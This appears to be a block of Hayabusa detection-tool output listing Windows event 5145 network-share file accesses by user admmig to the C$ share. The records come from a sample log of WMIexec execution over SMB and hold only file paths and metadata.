+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
